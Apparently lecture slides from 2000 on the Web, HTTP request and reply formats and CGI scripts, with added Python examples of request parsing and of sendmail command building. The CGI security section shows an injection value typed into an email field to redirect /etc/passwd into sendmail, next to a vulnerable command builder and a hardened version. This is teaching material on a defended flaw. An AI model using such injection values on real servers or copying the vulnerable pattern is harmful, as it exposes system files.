WWW: an Internet application Bill Chu

Upload: joella-holt

Post on 14-Jan-2016


WWW: an Internet application

Bill Chu


© Bei-Tseng Chu Aug 2000

WWW Web and HTTP

- The WWW web is a collection of interconnected information servers
  - each server maintains a collection of documents
  - a client can request a document from any information server
  - one document can refer to another document in any information server via a hyperlink
- HTTP is the application protocol that defines the WWW server-client interactions
  - the HTTP server maintains the HTTP documents
  - the HTTP client obtains and displays the HTTP documents


The client and server architecture

- A client connects to a server to send and receive information
- A server is typically a “large” computer that is capable of handling multiple client requests at the same time.
- The WWW is the universal client server architecture.


Benefits of the Client Server architecture

- Effective model for information sharing
- Server makes information available for multiple clients
- Clients are sure to receive the most up to date information
- Server technology can be changed (e.g. a database change) without affecting clients
- Clients can be dispersed geographically
- Server maintenance is easier since all clients are connecting to one place.


Protocol

- A protocol is a series of steps, involving two or more parties, designed to accomplish a task
- Everyone involved in the protocol must know the protocol and all of the steps to follow in advance
- Everyone in the protocol must agree to follow it
- The protocol must be unambiguous; each step must be well defined and there must be no chance of a misunderstanding.
- The protocol must be complete; there must be a specified action for every possible situation.


HyperText Transfer Protocol (HTTP)

Address: IP address + TCP port 80

Format:

HTTP request format

    Request request-URL HTTP-version
    0 or more headers
    <blank line>
    Body if it is a POST request

HTTP reply format

    HTTP-version response-code response-phrase
    0 or more headers
    <blank line>
    body (HTTP document)

Rules:

- client sends an HTTP request to server
- server sends back an HTTP reply


Example

Step one: wait for a new request

- The httpd program waits for a request to arrive from some client somewhere on the Internet.
- The server program listens on a port (default 80) and is dormant in this state.


Step two: A request arrives from a client

- A user might have typed in a URL at a browser: http://www.anywhere.com/sample.html
- The browser will request a connection with the server at www.anywhere.com
- The browser issues:

    GET /sample.html http/1.0
    User-agent: Mosaic for X Windows/2.4
    Accept: text/plain
    Accept: text/html
    Accept: images/*


Step three: The server parses the request

- The server decodes the message according to http protocol and determines what it should do:

    Method: GET
    Document: /sample.html
    Protocol: http, Version 1.0
    User agent: Mosaic for X Window/2.4
    Accept: text/plain, text/html, image/*


Step four: Do the method requested

- The httpd program fulfills the request.
- To GET a document, the server looks up the file (/sample.html) in its document tree
- Success: document sent

    HTTP/1.0 200 Document follows
    Server: NCSAV1.4
    Date: Thu, 20 Jul 2000 22:00:00 GMT
    Content-type: text/html
    Content-length: 1066
    Last-modified: Thu, 20 Jul 2000 20:38:00 GMT

- Failure: an error is sent

    HTTP/1.0 403 Not Found
    Server NCSA/1.4
    Date: Thu, 20 Jul 2000 22:00:00 GMT
    Content-type: text/html
    Content-length: 0


Step five: Finish up: close file; close network connection

- When the file is completely sent or an error message is sent, the httpd server is finished with its work. It closes the file and closes the network connection.
- The client receives the data and formats it according to http tags.
- The server is now ready for more requests and it goes to step 1.
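
The five steps above as code: an added example (not from the original slides) that parses the request of step two into the fields of step three and builds the reply of step four. The document tree and all function names are constructed; a missing document is answered with 404, the status code HTTP assigns to Not Found, and malformed input gets a 400 so that every situation has a specified action.

```python
# Constructed document tree: request path -> document body.
DOCUMENTS = {"/sample.html": b"<TITLE>Sample</TITLE><H1>Hello</H1>\n"}

# Constructed request matching step two (lines end in CRLF on the wire).
REQUEST = (b"GET /sample.html HTTP/1.0\r\n"
           b"User-agent: Mosaic for X Windows/2.4\r\n"
           b"Accept: text/plain\r\n"
           b"Accept: text/html\r\n"
           b"\r\n")

def parse_request(raw):
    """Step three: decode request line and headers; ValueError if malformed."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) != 3 or not parts[2].upper().startswith("HTTP/"):
        raise ValueError("bad request line")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if not sep or not name.strip():
            raise ValueError("bad header line")
        key = name.strip().lower()
        # Repeated headers (the Accept lines) are joined with commas.
        headers[key] = headers[key] + ", " + value.strip() if key in headers else value.strip()
    return {"method": parts[0], "document": parts[1], "version": parts[2],
            "headers": headers, "body": body}

def reply(code, phrase, body=b"", ctype="text/html"):
    """Build a reply: status line, headers, blank line, body."""
    head = "HTTP/1.0 %d %s\r\nContent-type: %s\r\nContent-length: %d\r\n\r\n" % (
        code, phrase, ctype, len(body))
    return head.encode("latin-1") + body

def handle(raw, documents=DOCUMENTS):
    """Steps three and four: every input gets a defined reply."""
    try:
        req = parse_request(raw)
    except ValueError:
        return reply(400, "Bad Request")
    if req["method"] != "GET":
        return reply(501, "Not Implemented")
    doc = documents.get(req["document"])
    if doc is None:
        return reply(404, "Not Found")
    return reply(200, "Document follows", doc)
```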


Web scripts and CGI

- A web script is a program that can be executed by the web server in response to web requests.
- Any program can be a web script; there is no mandatory language
- Common Gateway Interface (CGI) is a standard for how scripts can be called (by httpd) and how data is passed between the httpd server and the script


Example

Step one: wait for a new request

- The httpd program waits for a request to arrive from some client somewhere on the Internet.
- The server program listens on a port and is dormant in this state.


Step two: A request arrives from a client

- A user might have typed in a URL at a browser: http://www.anywhere.com/scripts/how_busy_are_you
- The browser will request a connection with the server at www.anywhere.com
- The browser issues:

    GET /scripts/how_busy_are_you http/1.0
    User-agent: Mosaic for X Windows/2.4
    Accept: text/plain
    Accept: text/html
    Accept: images/*


Step three: Do the method requested

- The httpd program fulfills the request by executing the script. The server knows it is a script because it is a file under the directory “script”. The name of the “script” directory is set at web server configuration time.
- To GET the script, the server looks up the file (/scripts/how_busy_are_you) in its document tree
- Success: the output of the script (normally directed to the screen) is sent to the browser

    HTTP/1.0 200 Document follows
    Server: NCSAV1.4
    Date: Thu, 20 Jul 2000 22:00:00 GMT
    Content-type: text/plain

    11:35am up 7 days, 4:35, 5 users, load average: 0.00, 0.09, 0.00

- Failure: an error is sent

    HTTP/1.0 200 Document follows
    Server: NCSAV1.4
    Date: Thu, 20 Jul 2000 22:00:00 GMT
    Content-type: text/plain

    Cannot find uptime command on this system


Step four: Finish up: close file; close network connection

- When the file is completely sent or an error message is sent, the httpd server is finished with its work. It closes the file and closes the network connection.
- The client receives the data and formats it according to http tags.
- The server is now ready for more requests and it goes to step 1.


Scripts and forms

    <TITLE> Form for CSO PH Query </TITLE>
    <H1> Form for CSO PH Query </H1>
    This form will send a PH query to the specified ph server
    <p><hr>
    <form ACTION="http://www.server.org:80/scripts/directory_assistance">
    PH server: <INPUT TYPE="text" Name="Jserver" VALUE="ns.anywhere.com" MAXLENGTH="256">
    <dd><input type="checkbox" NAME="doname" VALUE="yes"> Return name? </dd>
    <dd><input type="checkbox" NAME="dophone" VALUE="yes"> Return phone? </dd>
    <dd><input type="checkbox" NAME="doemail" VALUE="yes"> Return email? </dd>
    <H3> At least one of the following fields must be specified: </h3>
    <ul>
    <li> <input type="text" NAME="Qname" MAXLENGTH="256"> Name
    <li> <input type="text" Name="Qname" MAXLENGTH="256"> Email
    </ul>
    <input type="submit">
    </form>


Passing arguments to web scripts

When the submit button is clicked the browser sends:

    GET http://www.anywhere.com:80/scripts/directory_assistant?Jserver=ns.anywhere.com&doname=yes&dophone=yes&Qname=&[email protected] http/1.0


HTTP request methods

- GET: retrieve information from the server. It is the most commonly used. It can also be used in conjunction with CGI to pass parameters to the server
- HEAD: it is identical to GET, except that the server does not return a document. It is useful for verifying that a document exists, for checking links, or for checking time of modification
- POST: allows the server to receive data from the client. It is most commonly used to send the data in HTML forms to the server for processing.


Security risks for CGI

Consider a web-based email form:

    <form ACTION="http://www.coolmail.com/scripts/sendmail.pl">
    <ul>
    <li> email: <input type="text" NAME="email" MAXLENGTH="256">
    <li> message: <input type="text" NAME="message" SIZE=46 MAXLENGTH="2560">
    </ul>
    <hr>
    <input type="submit" VALUE="Send">
    </form>


Security problem

- Suppose the Perl script saves the message into a temp file and executes the Unix command:

    sendmail [email protected] <temp

- A malicious user could type in the field for email address:

    [email protected] </etc/passwd;

- This turns into:

    sendmail [email protected]</etc/passwd;<temp
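
The path from "Passing arguments to web scripts" to the "Security problem" above, with the vulnerable command construction beside a hardened one. This is an added example in Python rather than the Perl script the slides refer to, and is not code from the original slides; the address user@example.org, the query strings and all function names are constructed. shell_view only tokenises the command the way a POSIX shell would and runs nothing, which is enough to show the `<` and `;` from the form field arriving as shell operators.

```python
import re
import shlex
import subprocess
from urllib.parse import parse_qs

# Constructed query strings, as a browser would percent-encode the form fields.
# The address is a placeholder; "+" decodes to a space.
BENIGN = "email=user%40example.org&message=hello"
HOSTILE = "email=user%40example.org+%3C%2Fetc%2Fpasswd%3B&message=hello"

# Allowlist: starts alphanumeric, no whitespace, no shell metacharacters.
ADDRESS_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9._+-]*@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+")

def form_fields(query_string):
    """Decode a CGI query string into {field name: first value}."""
    pairs = parse_qs(query_string, keep_blank_values=True)
    return {name: values[0] for name, values in pairs.items()}

def vulnerable_command(fields, temp="temp"):
    """The slide's pattern: the field is pasted into a shell command line."""
    return "sendmail " + fields["email"] + " <" + temp

def shell_view(command):
    """Split the way a POSIX shell does, with operators as separate tokens."""
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    return list(lexer)

def hardened_argv(fields):
    """Validate the address, then build an argument vector (no shell involved)."""
    address = fields.get("email", "")
    if not ADDRESS_RE.fullmatch(address):
        raise ValueError("rejected address: %r" % address)
    return ["sendmail", address]

def send(fields, temp_path):
    """Run sendmail directly; the message file becomes stdin without any '<'."""
    with open(temp_path, "rb") as body:
        return subprocess.run(hardened_argv(fields), stdin=body).returncode

if __name__ == "__main__":
    for qs in (BENIGN, HOSTILE):
        print(shell_view(vulnerable_command(form_fields(qs))))
```

With the benign input the shell sees one redirect, the one the script's author wrote; with the hostile input it sees a second redirect and a command separator that came from the form field, while hardened_argv rejects that same field before any process is started.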